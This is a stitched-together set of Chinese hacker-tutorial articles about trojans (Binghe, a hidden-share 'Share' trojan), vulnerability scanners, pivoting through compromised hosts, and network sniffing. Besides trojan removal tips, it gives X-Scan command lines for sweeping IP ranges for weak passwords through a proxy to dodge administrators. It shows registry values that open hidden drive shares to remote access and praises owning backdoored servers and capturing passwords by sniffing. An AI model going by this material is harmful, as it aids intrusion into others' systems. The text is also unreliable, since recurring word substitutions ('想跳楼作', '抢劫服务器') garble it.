　　§c:\改动前[　　HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command]的：
　　默认="Notepad.exe %1"
　　§c:\改动后[　　HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command]的：
　　默认="C:\\WINDOWS\\SYSTEM\\Sysexplr.exe %1"

可以看出之所以冰河可以自我恢复主要靠的是C:\\WINDOWS\\SYSTEM\\Sysexplr.exe，而且冰河服务器端的编制是加密的，没法简单的通过改注册表得到或换掉。另外值得一提的是，即便你删除了这个键值，也并非平安大吉，冰河还会随时出来给你捣乱，主要因为冰河的服务端也会在c:\ windows目录下生成一个叫 sysexplr.exe文件，当然这个目录会随你windows的安装目录变化而变化。
??
　　“这个文件名好像超级解霸啊，冰河竟然如此狠毒。”

　　“哈哈哈哈，你说的很对，也很聪明，这个文件的确很像超级解霸，但是这还是不够称得上为阴险，最为阴险的是这个文件是与文本文件相关联的，只要你打开文本，sysexplr.exe程序就会重新生成一个krnel32.exe，此时你的电脑还是被冰河控制著。而且如果你失误将sysexplr.exe 程序破坏，你计算机的文本文件将无法打开。”

　　木马都会很注意自己的端口，多达六万多中的端口很容易让我们迷失其中，如果你留意的话就会发现，通常情况下木马端口一般都在1000以上，并朝着越来越大的趋势发展。这主要是因为1000以下的端口是常用端口，况且用时占用这些端口可能会造成系统不正常，木马也就会很容易暴露；此外使用大的端口也会让你比较难发现隐藏其中的木马，如果使用远程扫描端口的方式查找木马，端口数越大，需要扫描的时间也就越多，故而使用诸如8765的端口会让你很难发现隐藏在其中的木马。

　　四

　　“既然木马如此的阴险，那么前辈有何可知木马的方法啊？”

　　“现在的木马虽然阴险，但终究逃不过几个道理。平时出名的木马，杀毒软件就多数能够对付。但是现在木马种类繁多，有很多杀毒软件对付不了的。但是，只要我们谨记一下几个方法，就能够手到擒来。”

　　“首先，我们可以选择端口扫描来进行判断，因为木马在被植入计算机后会打开计算机的端口，我们可以根据端口列表对计算机的端口进行分析。此外，查看连接也是一种好办法，而且在本地机上通过netstat -a（或某个第三方的程序）查看所有的TCP/UDP连接，查看连接要比端口扫描快，而且可以直观地发现与我们计算机连接的有哪些IP地址。当然，如果你对系统很熟悉的话，也可以通过检查注册表来进行木马的杀除，但是这个方法不适合于那些菜鸟级用户。查找木马特征文件也是一种好方法，就拿冰河来说……”

　　“这个我知道前辈，木马冰河的特征文件一定是G_Server.exe。”

　　“那有这么简单。冰河植入计算机后真正的特征文件是kernl32.exe和sysexlpr.exe。”

　　“太狠毒了，一个跟系统内核文件一样，一个又像超级解霸。那么前辈我们把这两个文件删除掉，这冰河岂不就消失了。”

　　“的确，你要是在DOS模式下删除了他们，冰河就被破坏掉了，但是你的计算机随之会无法打开文本文件，因为你删除的sysexplr.exe文件是和文本文件关联的，你还必须把文本文件跟notepad关联上。修改注册表太危险，你可以在Windows资源管理器中选择查看菜单的文件夹选项，再选择文件类型进行编辑。不过最简单的方法是按住键盘上的SHIFT键的同时鼠标右击任何一个TXT为后缀的文本文件，再选择打开方式，选中〖始终用该程序打开〗，然后找到notepad一项，选择打开就可以了。”

　　“哈哈，按照前辈这么说来，我们只要抓住了这特征，天下的木马也奈何不了我们了。”

黑客常用兵器之木马篇（下）

五

　　“哈哈，你可知道除了冰河这样的木马经常使用的隐身技术外，更新、更隐蔽的方法已经出现，这就是―驱动程序及动态链接库技术。驱动程序及动态链接库技术和一般的木马不同，它基本上摆脱了原有的木马模式―监听端口，而采用替代系统功能的方法改写驱动程序或动态链接库。这样做的结果是：系统中没有增加新的文件所以不能用扫描的方法查杀、不需要打开新的端口所以不能用端口监视的方法进行查杀、没有新的进程所以使用进程查看的方法发现不了它，也不能用kill 进程的方法终止它的运行。在正常运行时木马几乎没有任何的症状，而一旦木马的控制端向被控端发出特定的信息后，隐藏的程序就立即开始运作。此类木马通过改写vxd文件建立隐藏共享的木马，甚是隐蔽，我们上面的那些方法根本不会对这类木马起作用。

　　“可是前辈说的这种木马晚生并没有见到啊。”

笨蛋！你没有见过，你怎么知道我老人家也没有见过？告诉你我已经看到了一个更加巧妙的木马，它就是Share。运行Share木马之前，我先把注册表以及所有硬盘上的文件数量、结构用一个监控软件DiskState记录了起来，这个监控软件使用128bit MD5的技术来捕获所有文件的状态，系统中的任何文件的变动都逃不过他的监视，这个软件均会将它们一一指出。”

　　“前辈我这里第一次运行Share后，系统好像没有动静，使用Dllshow（内存进程察看软件）观看内存进程，似乎也没有太大的变化。一般木马都会马上在内存驻留的，或许此木马修改了硬盘上的文件。”

　　“好，那么你就接着用DiskState比较运行share.exe前后的记录。”

　　“程序显示windows\applog里面的目录的一些文件和system.dat、user.dat文件起了变化，并没有其他文件的增加和修改。”

　　“系统中的applog目录里面存放了所有应用程序函数和程序调用的情况，而system.dat和user.dat则是组册表的组成文件。你把applog目录里面的share.lgc打开来观看，它的调用过程是什么？”

　　“调用过程如下：

　　c15625a0 92110 "C:\WINDOWS\SYSTEM\OLEAUT32.DLL"
　　c1561d40 c1000 "C:\WINDOWS\SYSTEM\OLE32.DLL"
　　c1553520 6000 "C:\WINDOWS\SYSTEM\INDICDLL.DLL"
　　c15d4fd0 2623 "C:\WINDOWS\WIN.INI"
　　c15645b0 8000 "C:\WINDOWS\SYSTEM\SVRAPI.DLL"
　　c1554190 f000 "C:\WINDOWS\SYSTEM\MPR.DLL"
　　c154d180 a1207 "C:\WINDOWS\SYSTEM\USER.EXE"
　　c1555ef0 13000 "C:\WINDOWS\SYSTEM\MSNET32.DLL"

　　但是为什么前辈我们看不到MSWINSCK.OCX或WSOCK2.VXD的调用呢？如果木马想要进行网络通讯，是会使用一些socket调用的。”

　　“那么接着你再观察注册表的变化。”
　　“好像在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ Network\LanMan下面，多了几个键值，分别是CJT_A$、CJT_C$、CJT_D$、CJT_E$、CJT_F$，其内部键值如下：

　　"Flags"=dword:00000302
　　"Type"=dword:00000000
　　"Path"="A:\\" 《-----路径是A到F
　　"Parm2enc"=hex:
　　"Parm1enc"=hex:
　　"Remark"="黑客帝国"
　　”
　　“这就对了，然后你在浏览器的地址栏输入\\111.111.111.1\CJT_C$。”

　　“啊！居然把我的C盘目录文件显示出来了。”
　　“现在你把CJT_C$改成matrix然后重启计算机，接着在浏览器的地址栏输入\\111.111.111.1\matrix。”

　　“前辈也显示C盘目录文件了，很奇怪的是，在我的电脑里面硬盘看上去并没有共享啊？”
　　“哈哈，那你再把"Flags"=dword:00000302的302改成402，reboot计算机。”

　　“嘻嘻，硬盘共享已显示出来了。那么如何防止这种木马那？”
“哈哈哈哈，这种木马只不过用了一个巧妙的方法隐藏起来而已。你现在把HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\Network\LanMan下面的CJT_A$、CJT_C$、CJT_D$、CJT_E$、 CJT_F$全部删掉。如果你还放心不下，也可以把windows\system\下面的Vserver.vxd（Microsoft 网络上的文件与打印机共享，虚拟设备驱动程序）删掉，再把[HKEY_LOCAL_MACHINE\System\CurrentControlSet\ Services\VxD\下的VSERVER键值删掉。这样就可以了。另外，对于驱动程序/动态链接库木马，有一种方法可以试试，使用Windows的〖系统文件检查器〗，通过〖开始菜单〗－〖程序〗－〖附件〗－〖系统工具〗－〖系统信息〗－〖工具〗可以运行〖系统文件检查器〗，用〖系统文件检查器〗可检测想跳楼作系统文件的完整性，如果这些文件损坏，检查器可以将其还原，检查器还可以从安装盘中解压缩已压缩的文件。如果你的驱动程序或动态链接库在你没有升级它们的情况下被改动了，就有可能是木马，提取改动过的文件可以保证你的系统安全和稳定。”

　　六

　　“此外很多人中木马都会采用如下手段：

　　1．先跟你套近乎，冒充成漂亮的美眉或者其他的能让你轻信的人，然后想方设法的骗你点他发给你的木马。

　　2．把木马用工具和其它的软件捆绑在一起，然后在对文件名字进行修改，然后修改图标，利用这些虚假的伪装欺骗麻痹大意的人。

　　3．另外一种方法就是把木马伪装好后，放在软件下载站中，着收渔翁之利。

　　所以我这里提醒你一些常见的问题，首先是不要随便从小的个人网站上下载软件，要下也要到比较有名、比较有信誉的站点，通常这些网站的软件比较安全。其次不要过于相信别人，不能随便运行别人给的软件。而且要经常检查自己的系统文件、注册表、端口等，而且多注意些安全方面的信息。再者就是改掉 windows关于隐藏文件后缀名的默认设置，这样可以让我们看清楚文件真正的后缀名字。最后要提醒你的是，如果有一天你突然发现自己的计算机硬盘莫名其妙的工作，或者在没有打开任何连接的情况下，猫还在眨眼睛，就立刻断线，进行木马的搜索。”

黑客常用兵器之扫面篇（上）

刀，兵器谱上排名第六。
　　刀；
　　一把好刀，光亮如雪；
　　刃；
　　一抹利刃，吹发即断；

　　黑客手中的扫描器如同刺客手中之刀，杀人、保命；攻击、补漏。

　　如果一个黑客手中没有一两个扫描器，那么他算不上是一个黑客，至少他是一个手里没有“刀”的黑客。没有“刀”的黑客是难以生存的……】

　　“前辈，您为何如此看好扫描器？为什么黑客必须要有扫描器？”

　　“后生，你上次木马害我不浅，你这次又像搞什么花样？”

　　“上次小生只是跟前辈开了一个玩笑，还望前辈见谅。”

　　“罢了，我老人家还不止于和你如此一般见识。此次你又有什么不清楚的？”

　　“我不太清楚扫描器为何会像您所说的有如此大的威力，扫描器在黑客攻击中能起到什么作用？”

　　“看来你现在也是一个手里没有刀的黑客，扫描器在一个成熟的黑客手里有着相当大的作用。因为进化到会用扫描器一级的黑客，他们就会很少有人在对那些无知的个人用户感兴趣，注意力更多的被吸引到了服务器上。而对付服务器最好的方法就是找到服务器系统的漏洞，或者服务器相关软件的漏洞。对于传统的手工查找来说，不但查找漏洞的速度过于缓慢，而且多数情况下只能针对某一个特定的漏洞，感觉有点大海捞针的味道。而扫描器就是一种快速寻找服务器系统相关漏洞的工具，通过它们，黑客可以根据自己的带宽和系统情况，以他们自己喜欢的速度和方式来快速的寻找系统漏洞，而且这多数扫描器可以同时扫描多种漏洞，很容易找到系统的漏洞和弱点，此时黑客就可以根据扫描器提供的漏洞报告和信息，采用合适的攻击方法对目标给以致命的一击。”

　　“前辈，那我如何找到扫描器，平时我好像很少接触到这些东西啊。”

　　“呵呵，你用过小榕的流光系列吗？”

　　“这个当然是接触过了。”

　　“其实小榕的流光就是一款结合强大扫描功能的软件，只不过他在流光中加入了一些攻击和破解成份。”

“扫描器果然强大，我就曾用流光攻破过许多的黄色和反动网站，特别是他的FTP和新加入的SQLCMD功能，非常的强大。而且界面非常的友好，让我这种菜鸟用户很容易上手。”



　　“你说的不错，但是虽然小榕的流光非常出色，并兼备强大的破解和攻击成份，但是总的来说它不能算的上是一个真正的扫描器。而且流光主要体现在破解，攻击性很强，没有太多的对目标系统扫描后的分析报告，所以流光在我看来只能算是是一个涵盖扫描功能的强大破解软件。”

　　“那么在前辈的眼中，什么样的软件是一个强大的扫描软件，什么样的扫描器才能成为黑客手中的屠龙刀？”

　　“一个好的扫描器必须有简洁和易于使用的想跳楼作界面，强大的分析和扫描信息范围，对最新漏洞的扫描判断能力（也就是通常所说的升级概念），详细的分析结果报告和对漏洞的描述与对策。这样的“刀”才能算的上是黑客手中的一把宝刀。”

　　“前辈能否给我点评一下如今最为流行的扫描器的特点和性能呢？”

　　“说道当今网络安全界流行的扫描器，其中最为优秀的就要算是ISS公司出品的商业扫描器了。它能针对上千种的系统和软件漏洞对服务器作出全面的细微扫描，而且能够生成比较详细的扫描报告，应该说是先进最好的扫描器了。”

　　“前辈这个扫描器我可以从什么地方下载？”

　　“无知！商业扫描器，当然是不能免费下载的了，你要花钱去买！”

　　“还需要花钱啊，哪有没有不花钱的扫描器呢？”

　　“当然有了，扫描器是黑客必备的工具之一，要是都花钱去买那不符合黑客的风格。我们可以在网上找到很多免费的而且同样很优秀的黑客扫描器。在国外比较常用的有Cerberus Internet Scanner简称CIS，还有乌克兰SATAN。我们国内的也有安全焦点的X-Scanner，与小榕的流光。”

　　“前辈说的这几种扫描器我只用过流光，我个人认为流光很出色，其他的扫描器也只有所耳闻，但不知道有什么特点，还请前辈赐教。”

　　“比起你用过的流光来说，ISS算得上是一个真正的管理员使用的系统扫描工具，首先它能扫描一些众所周知的系统漏洞和系统弱点，包括一些往往被用户忽略的问题，这些问题是一些经常被黑客利用的漏洞和弱点。ISS有更为强大的漏洞分析功能，并且它不会允许非法访问，但是实际情况是ISS已经背离了它的初衷目的。”

　　“任何好的事物都有不利的一面，更何况一把刀，而且是把宝刀。”

　　“这话不错，ISS的确是安全界最为出色的扫描器，而且他还是第一个可以公开得到的多层次扫描器。特别是它的可移植性和灵活性，众多的UNIX的平台上都可以运行ISS，ISS的扫描时间和效率也是很快的，很适合于企业级的用户。”
“前辈，我插一句话，虽然ISS足够强大，但是它毕竟不是免费的午餐，这就不符合我们的黑客精神了。您那里有没有一些强大而且免费的扫描器？”

　　“扫描器庞大的家族中怎么会没有免费的，你听说过NMAP吗？”

　　“NMAP倒是有所耳闻，以前在许多安全网站上见到过这个名字，但是我不知道它是干什么用的一个东西。”

　　“NMAP其实就是一个功能强大的扫描器。它的强大之处在于它支持UDP，TCP (connect)，TCP SYN(half open)，ftp proxy(bounce attack)，Reverse-ident，ICMP(ping sweep)，FIN，ACK sweep，Xmas Tree，SYN sweep，Null等多种扫描协议和扫描方式。但是总的来说它的最大的优点莫过于隐蔽性高，这是由于它采用的是“半开”的一种扫描方式，此外它提供的 Stealth FIN，Xmas Tree与Null扫描模式更是让被扫描者难以发现。也正是因为这一点的原因，NMAP深受一些骨灰级黑客的喜爱。像一般黑客喜欢的秘密扫描、动态延迟、重发与平行扫描、欺骗扫描、端口过滤探测、RPC直接扫描、分布扫描等，NMAP均可以实现，可以说NMAP是一个灵活性很大的扫描器。通过强大系统的扫描，它还可以分析出服务器的端口处于Open状态还是被防火墙保护状态。

黑客常用兵器之扫描篇（下）

　“前辈，我的系统使用的是Windows，您能不能介绍一些我这种菜鸟级黑客也能用的扫描器？当然前提是在Windows系统下运行啊。”

　　“既然这样，我想Cerberus Internet Scanner(CIS)可能比较合适与你，它主要运行在Windows NT和Windows2000的平台下面，当然它也主要是针对微软的Windows想跳楼作系统进行探测扫描的。CIS拥有绝大多数菜鸟喜欢的 Windows友好界面，而且它提供进行扫描的安全问题也是通常在Windows中经常见到的，其中包括：
　　（1） WWW服务
　　（2） FTP服务
　　（3） MS SQL Server 数据库扫描
　　（4） NetBIOS 共享扫描
　　（5） 注册表设置
　　（6） NT服务漏洞
　　（7） SMTP服务扫描
　　（8） POP3服务扫描
　　（9） RPC服务扫描
　　（10） 端口映射
　　（11） Finger服务
　　（12） DNS安全扫描
　　（13） 浏览器安全等



　　在CIS中，它最为引人注目的还要数NetBIOS共享扫描。CIS能根据NetBIOS这一漏洞作出NETBIOS资源信息、共享资源、计算机用户名、工作组和薄弱的用户口令等详细的扫描分析。它的想跳楼作方法也是非常的容易，你只需要输入目标服务器的地址，然后选择你想要扫描的相关漏洞就可以进行扫描分析了。扫描完毕后他会主动生成一个HTML的报告共你分析结果。你可以在http://www.cerberus-infosec.co.uk/ 下载获得。”

“这款扫描器的功能是否太过于简单了哪？我感觉它比起前几个您说的那些扫描器，功能过于少了，而且没有流光那么有成效。”


　　“SATAN作为扫描器的鼻祖可能很适合你，由于它采用的是一个Perl的内核，通过PERL调用大量的C语言的检测工具对目标网站进行分析，所以你打开浏览器用IE方式就可以直接想跳楼作，使用也相对简单，我就不在这里介绍他浪费时间了。

　　作为黑客的利刃，国产的CGI & Web Scanner也是一个不错的扫描器，这个宝刀是由zer9设计完成打造的。这款扫描器主要是针对动态网站技术的安全问题来设计的。”

　　“动态网站？”

　　“对，动态网站。随着网站设计的日趋复杂化，网站的技术人员会利用一些诸如CGI、ASP、PHP、jsP等网站动态交互技术与相应的服务软件对网站进行开发，这些东西大大地减轻了网站的维护和更新工作量，但是也正是这些技术，导致了大量的安全问题，特别是很多网站动态第三方程序在设计之初根本就没有对安全问题考虑太多，导致了大量的系统漏洞的出现。而CGI & Web Scanner就是专门针对这些动态的网页上出现的漏洞进行扫描的一把利刃。

　　CGI & Web Scanner的主要功能有：
　　（1） 检测203个已知的CGI漏洞
　　（2） 通过HTTPD辨认服务器类型
　　（3） 有更新漏洞的功能
　　（4） Microsoft SQL Server DOS检测
　　（5） Httpd Overflow检测
　　（6） IIS Hack检测
　　（7） ASP检测
　　（8） DOT 漏洞检测

　　而且它可以多线程扫描，并对常见的D.O.S（拒绝服务攻击）和Overflow等也进行探测，很适合初级杀手作为武器。至于你关心的使用方法，就更为简单了，输入目标服务器的IP地址，选择需要扫描的漏洞种类点击扫描按键，就开始了。”


　　“没有想到国产扫描器还有如此优秀的！”

　　“这个是自然，作为黑客的必备武器之一，国产扫描器有很多优秀的作品，前面我提到的安全焦点的X-Scanner，就是我最为欣赏的扫描器，而且我老人家也时常常的使用，但是不知道为什么，在对X-Scanner进行病毒测试的时候，熊猫和KV3000都能在X-Scanner里面发现两个木马程序。这一点是我们要非常的注意的。当然也要请安全焦点的朋友做做解释工作。”

　　“前辈既然如此欣赏X-Scanner，那就给我详细介绍一下吧！”



　　“X-Scanner运行在Windows平台下，它主要针对WindowsNT/Windows 2000想跳楼作系统的安全进行全面细致评估，可以扫描出很多Windows系统流行的漏洞，并详细的指出安全的脆弱环节与弥补措施。X-Scanner 采用多线程方式对指定IP地址段(或单机)进行安全漏洞扫描，支持插件功能，提供了图形界面和命令行两种想跳楼作方式。
　扫描范围包括：
　　（1）标准端口状态及端口banner信息；
　　（2）CGI漏洞；
　　（3）RPC漏洞；
　　（4）SQL-SERVER默认帐户；
　　（5）FTP弱口令；
　　（6）NT主机共享信息；
　　（7）用户信息；
　　（8）组信息；
　　（9）NT主机弱口令用户等。

　　X-Scanner会将扫描结果保存在/log/目录中，index_*.htm为扫描结果索引文件。并对于一些已知漏洞，X-Scanner给出了相应的漏洞描述，利用程序及解决方案。X-Scanner扫描的内容是绝大多数的服务器容易出现的漏洞和安全设置问题。最常用的还是其中的SQL默认帐户、FTP弱口令和共享扫描，他们能揭示出许多麻痹大意的网管犯的一些低级错误。”


　　“前辈能不能具体说说X-Scanner如何使用呢？”

　　“打开了X-Scanner，在扫描项目中可以任意的指定单独扫描哪一个特定的项目。比较多的是CGI和SQL或者FTP默认口令，这些都是很致命的服务器漏洞。”



　　“下一步需要在〖扫描设置〗中进行参数的设置。一般的情况下，只对〖运行参数〗中的扫描范围进行设置。在那里只要填写网站服务器的IP地址就可以，可以填写一个来针对某一个特定的网站或服务器，也可以填写一个IP段范围，来扫描一段IP地址上所有的计算机。具体扫描参数格式如下：

　　1.命令行：Xscan -h [起始地址]<-[终止地址]> [扫描选项]

　　 其中的[扫描选项]含义如下：
　　 -p: 扫描标准端口(端口列表可通过\dat\config.ini文件定制)；
　　 -b: 获取开放端口的banner信息，需要与-p参数合用；
　　 -c: 扫描CGI漏洞；
　　 -r: 扫描RPC漏洞；
　　 -s: 扫描SQL-SERVER默认帐户；
　　 -f: 尝试FTP默认用户登录(用户名及口令可以通过\dat\config.ini文件定制)；
　　 -n: 获取NetBios信息(若远程主机想跳楼作系统为Windows9x/NT4.0/2000)；
　　 -g: 尝试弱口令用户连接(若远程主机想跳楼作系统为Windows NT4.0/2000)；
　　 -a: 扫描以上全部内容；

-x [代理服务器:端口]: 通过代理服务器扫描CGI漏洞；
　　 -t: 设置线程数量，默认为20个线程；
　　 -v: 显示详细扫描进度；
　　 -d: 禁止扫描前PING被扫主机。

　　2.示例：
　　Xscan -h xxx.xxx.1.1-xxx.xxx.10.255 -a
　　含义：扫描XXX.XXX.1.1-XXX.XXX.10.255网段内主机的所有信息；

　　Xscan -h xxx.xxx.1.1 -n -g -t 30
　　含义：获取XXX.XXX.1.1主机的Netbios信息，并检测NT弱口令用户，线程数量为30；

　　Xscan -h xxx.xxx.1.1 -p -b -c -x 129.66.58.13:80 -v -d
　　含义：扫描xxx.xxx.1.1主机的标准端口状态，通过代理服务器"129.66.58.13:80"扫描CGI漏洞，检测端口banner信息，且扫描前不通过PING命令检测主机状态，显示详细扫描进度。”



　　“在〖运行参数〗中，有很大的选择余地，比如它可以设置代理服务器来躲避网管的追查，并课以设置扫描的线程。对扫描显示也可以进行详细的选择。然后扫描器就开始工作了。”

　　“好啊，我去试试。”

　　“另外我要提醒你注意的是，在使用这些扫描软件的时候一定要看清楚里面有没有可以的程序，以防自己先中了别人的招。此外，虽然你刺客手中有刀，但是现在的网站管理员也会使用这些宝刀，所以说，手中有绝世好刀，不一定就能杀死所有的敌人。好了，你去吧！”

代理、肉鸡、跳板的概念

看到有的网友还用那种8080、80端口的代理，我有话说，也可以说为大家做一点最最基础的黑客教程，大家看完自己去做吧，具体怎么做，我就不说了，可以说我把我所知道的肉鸡和跳板的概念知识全部告诉大家了，我也在几个地方发表过，这是我的原创，我要告诉大家的是真正在黑客抢劫服务器是用的跳板是什么，以及黑客们很少说的跳板知识介绍~~~~~~~~~~我有个习惯，
总是喜欢让大家看一篇文章的时候知道：为 什么要看这篇文章？这篇文章要让
自己知道或是学到什么东西，我尽量把自己所 掌握的东西尽量简化后用通俗的
语言表达。大家看完后有什么不好的地方，请指出，我好学习到新的东西，我很高兴自己能
把自己所学到的东西和大家分享，在 这里的认识的网友们有想成为黑客的；有
想随便玩玩；有的想学，但是不久就感
觉学网络安全很难就退却了。我真的很希望大家能找到自己的目标，做自己喜欢
的事情，不要一天就黑小企鹅和一天泡在别人的软件里（至少要尝试读一些简单的

代码），学习黑客知识是孤独的，必须完全靠自己的努力，很少有人能帮你的，

开始你会觉得很无助，但是慢慢的，你将习惯这种感觉和方式，要自己努力才会

有成果的，我和大家一样也在不停的探索网络知识，现在不过是把自己学到的东

西和大家分享罢了。是不是我象大姨妈啊！！呵呵~~~婆婆***！我看到很
多的网友聊代理的时候，概念很模糊，甚至搞出了笑话，所以今天我就谈谈很多
朋友初涉网安的一个

误区（认识代理、跳板、肉鸡）。有的网友说那还不简单，找个运行就能隐藏IP

的软件，我早说过了，我没有见过这种软件或许说根本不存在这种软件（懒惰的

人更勤于此道）再者对抢劫服务器者而言把自己的身家性命放在一个隐藏自己IP的软件

上是很不明智的，要知道抢劫服务器时会尝试很多的连接，在你一不小心的时候你就把

自己卖了（我曾经在一次抢劫服务器完毕后没有用sc32设置好跳板的IE，而是随手在

桌面上双击浏览器去看黑页，结果把自己给卖了，本来没有什么可怕的，但是我

们要养成做任何事都无懈可击的习惯。再者~~~嘘嘘~~还好是日本鬼子的系统

。）所以我根本不相信什么隐藏IP的软件，也许我孤陋寡闻或是真有这样的东西

，但至少我是不会用的，除非有人张罗着把我毙了，那么我可以考虑一下。

我要说此文适合菜鸟阅读，高手止步！！！

我上小企鹅，老有网友问我代理和跳板以及肉鸡是指同一类概念吗？它们怎么样工

作的？

因为在小企鹅上不可能讲很清楚，涉及的东西太多了，因为此文是面向和我一样初


人涉网络网络安全的朋友，那么我就简单的说说。

首先是代理（泛指80；8080；1080端口），很多网友认为用代理猎手设置好

端口之后就可以为自己找个代理在IE、FTP等里面设置后来隐藏IP，这就是肉鸡

或认为这就是跳板，其实不然，为什么呢？就我个人来看这样的代理简直就是垃

圾（有的网友不服气了，等等，我一会告诉你为什么我这么说），1、首先一个

速度比较慢，我用这样的代理用过很多国家，包括国内的，感觉都是其慢，没有

那种快速的感觉；2、不稳定。大家一定都想拥有一个稳定的代理吧~~~呵呵

但是这样的代理通常有原因的，不是服务器自身漏洞就是为了自身利益而增加的

服务，当他的愿望达成以后或是网管发现以后，你就不能再用了。3、多人使用。如果你

用8080、1080、80等端口的代理，我敢保证这个代理不止你一个人用，如果

你想成为一个黑客或是老手的话，拥有一个自己的代理是必须的。4、保密性。

有的代理服务器提供者很可恶，他们利用代理得知你的密码或一些敏感信息，因

为普通代理数据没有经过加密（1080端口除外），用一个嗅探器就可以知道你

输入的数据，别忘了代理的最最基本原理是数据转发哟。好了，有了以上的缺点

你还敢用或是有信心用它吗？这就是我为什么叫它垃圾的原因了。有网友会问：

那什么样的代理才没有这些缺点呢？别急，我下面就要说。

socks5.这是一个很不错的跳板软件，很小（32K）功能却是不凡，它是sock4

的接替者，原来的sock4只支持UDP协议（这个大家去看书吧，我不多说了），

而sock5支持USP和TCP两种协议，还有数据的传输是加密的所以真的很佩服作者的编程能力。如果你简

单的使用它，那你上个小企鹅啊或IRC啦，那是没有什么问题啦，而且它的速度很快

几乎和你使用本地机没有什么差别（当然不能加太多跳板），sock5支持你搭建

255个跳板，也就是你可以用skserverGUI来编辑多达255个安装了sock5的机

器来运行达到你隐藏IP的目的，但我想如果我看见有人这样做的话，我会马上打

电话到精神病院~~~：）而且用sc32来配合skserverGUI的话，那么你的电脑

几乎就没有应用程序不能用代理的。你用过之后一定会说：我喜欢！我选择！sock5的安装也很简单，在此软件的说明书里有，因为我主要是让大家了解代理- -----&g*;跳板------&g*;肉鸡的简单原理；再者因为制作这样的跳板或肉鸡很有攻击性（会构成非法使用

他人电脑），而且网上有很多人不自觉，我可不想以后有人被抓了，说我

曾经为他的犯罪生涯做过贡献。

好了！最后我们来说说肉鸡吧

肉鸡是什么？在小企鹅上也有朋友问我，我认为这是中国黑客对自己开了后门的服

务器为将来自己做一些事时使用的机器的一种自豪而又亲切的叫法.肉鸡是老手

常用的代理，也就是*elne*的那种，完全是靠自己制作的，端口加密码啦！绝对

只有你一个人用，当然被别人提前下手的话，那你就清除它的后门就可以了，当

你第一次拥有这种服务器的时候你的心情是什么样的？我个人感觉是象初恋一样

。

有3389肉鸡通常可以图形化*作，从而发动拒绝服务攻击，那么我们用什么样
系统的肉鸡呢？~~~~恩！marke这个

问题问的很好~~：）

我喜欢用windows 2000和linux，虽然我一直采用WIN 2000但是告诉大家一个

好消息我刚刚拥有了自己第一台LINUX肉鸡，对我这个正在学习LINUX的家伙来

说，没事到上面熟悉一下LINUX指令是件很愉快的事。要想学用这种肉鸡必须熟

练DOS指令（指windows)，因为没有图形界面让你玩的。做一个黑客必须适应字符化的*作
当你*elne*到一台你服务器里（肉鸡）


你就可以踏雪无痕了，就象“信息公路牛崽”（抢劫服务器五角大楼的美国天才黑客）一

样先连接到日本、到中东、再绕回美国本土抢劫服务器五角大楼，听上去很神秘吧，其

实用的原理就是这个。

网络监听概念

网络监听工具的提供给管理员的一类管理工具。使用这种工具，可以监视网络的状态、数据流动情况以及网络上传输的信息。

　　但是网络监听工具也是黑客们常用的工具。当信息以明文的形式在网络上传输时，便可以使用网络监听的方式来进行攻击。将网络接口设置在监听模式，便可以源源不断地将网上传输的信息截获。

　　网络监听可以在网上的任何一个位置实施，如局域网中的一台主机、网关上或远程网的调制解调器之间等。黑客们用得最多的是截获用户的口令。

　　什么是网络监听

　　网络监听是黑客们常用的一种方法。当成功地登录进一台网络上的主机，并取得了这台主机的超级用户的权限之后，往往要扩大战果，尝试登录或者夺取网络中其他主机的控制友。而网络监听则是一种最简单而且最有效的方法，它常常能轻易地获得用其他方法很难获得的信息。

　　在网络上，监听效果最好的地方是在网关、路由器、防火墙一类的设备处，通常由网络管理员来想跳楼作。使用最方便的是在一个以太网中的任何一台上网的主机上，这是大多数黑客的做法。




以太网中可以监听的原因

　　在电话线路和无线电、微波中监听传输的信息比较好理解，但是人们常常不太理解为什么局域网中可以进行监听。甚至有人问：能不能监听不在同一网段的信息。下面就讲述在以太网中进行监听的一些原理。在令牌环中，道理是相似的。

　　对于一个施行网络攻击的人来说，能攻破网关、路由器、防火墙的情况极为少见，在这里完全可以由安全管理员安装一些设备，对网络进行监控，或者使用一些专门的设备，运行专门的监听软件，并防止任何非法访关。然而，潜入一台不引人注意的计算机中，悄悄地运行一个监听程序，一个黑客是完全可以做到的。监听是非常消耗CPU资源的，在一个担负繁忙任务的计算机中进行监听，可以立即被管理员发现，因为他发现计算机的响应速度令人惊奇慢。

　　对于一台连网的计算机，最方便的是在以太网中进行监听，只须安装一个监听软件，然后就可以坐在机器旁浏览监听到的信息了。

　　以太网协议的工作方式为将要发送的数据包发往连在一起的所有主机。在包头中包含着应该接收数据包的主机的正确地址。因此，只有与数据包中目标地址一致的那台主机才能接收信包。但是，当主机工在监听模式下，无论数据包中的目标物理地址是什么，主机都将接收。

　　在Internet上，有许多这样的局域网。几台甚至十几台主机通过一条电缆一个集线器连在一起。在协议的高层或用户看来，当同一网络中的两台主机通信时，源主机将写有目的主机IP地址的数据包发向网关。但是，这种数据包并不能在协议栈的高层直接发送出去。要发送的数据包必须从TCP/IP协议的IP 层交给网络接口，即数据链路层。

　　网络接口不能识别IP地址。在网络接口，由IP层来的带有IP地址的数据包又增加了一部分信息：以太帧的帧头。在帖头中，有两个域分别为只有网络接口才能识别的源主机和目的主机的物理地址，这是一个48位的地址。这个48位的地址是与IP地址对应的。也就是说，一个IP地址，必然对应一个物理地址。对于作为网关的主机，由于它连接了多个网络，因此它同时具有多个IP地址，在每个网络中，它都有一个。发向局域网之外的帧中携带的是网关的物理地址。




在以太网中，填写了物理地址的帧从网络接口中，也就是从网卡中发送出去，传送到物理的线路上。如果局域网是由一条粗缆或细缆连接机而成，则数字信号在电缆上传输，信号能够到达线路上的每一台主机。当使用集线器时，发送出去的信号到达集线器，由集线器再发向连接在信线器上的每一条线路。于是，在物理线路上传输的数字信号也能到达连接在集线器上的每一主机。

　　数字信号到达一台主机的网络接口时，在正常情况下，网络接口读入数据帧，进行检查，如果数据帧中携带的确良物理地址是自己的，或者物理地址是广播地址，则将数据帧交给上层协议软件，也就是IP层软件，否则就将这个帧丢弃。对于每一个到达网络接口的数据帧，都要进行这个过程。然而，当主机工作在监听模式下，则所有的数据帧都将被交给上层协议软件处理。

